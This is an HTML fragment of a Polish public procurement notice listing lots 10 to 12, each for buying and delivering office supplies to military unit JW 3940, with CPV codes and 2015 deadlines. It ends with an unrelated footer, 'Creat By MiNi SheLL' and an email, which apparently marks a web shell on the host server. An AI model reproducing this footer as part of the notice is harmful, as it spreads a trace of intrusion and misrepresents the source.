<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 42.99.42.30-1, 31.63.00.00-1, 39.24.10.00-3, 30.19.50.00-2, 30.19.71.00-7, 30.19.59.00-1, 30.19.56.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr 10 - zakup i dostawa artykułów biurowych - Nr 10 (JW 3940)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 10 - zakup i dostawa artykułów biurowych - Nr 10 (JW 3940). Szczegółowy opis przedmiotu zamówienia określony został w SIWZ oraz załącznikach do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.21.25-3, 30.19.21.21-5, 30.19.21.60-0, 30.19.29.30-9, 30.19.21.60-0, 39.29.25.00-0, 30.19.21.31-8, 30.19.21.30-1, 30.19.21.11-2, 22.60.00.00-6, 30.19.21.33-2, 30.19.21.32-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie nr 11 - zakup i dostawa artykułów biurowych - Nr 11 (JW 3940)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 11 - zakup i dostawa artykułów biurowych - Nr 11 (JW 3940). Szczegółowy opis przedmiotu zamówienia określony został w SIWZ oraz załącznikach do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 22.81.63.00-6, 22.81.60.00-3, 30.19.28.00-9, 24.91.00.00-6, 30.19.71.10-0, 44.61.71.00-9, 39.29.25.00-0, 22.80.00.00-8, 30.19.95.00-5, 39.54.11.30-6, 30.19.72.20-4, 30.19.72.21-1, 44.42.42.00-0, 30.19.71.00-7, 30.19.93.10-6, 42.99.42.20-8, 30.19.29.10-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie nr 12 - zakup i dostawa artykułów biurowych - Nr 12 (JW 3940)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 12 - zakup i dostawa artykułów biurowych - Nr 12 (JW 3940). Szczegółowy opis przedmiotu zamówienia określony został w SIWZ oraz załącznikach do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 42.99.42.30-1, 31.63.00.00-1, 39.24.10.00-3, 30.19.71.00-7, 30.19.56.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com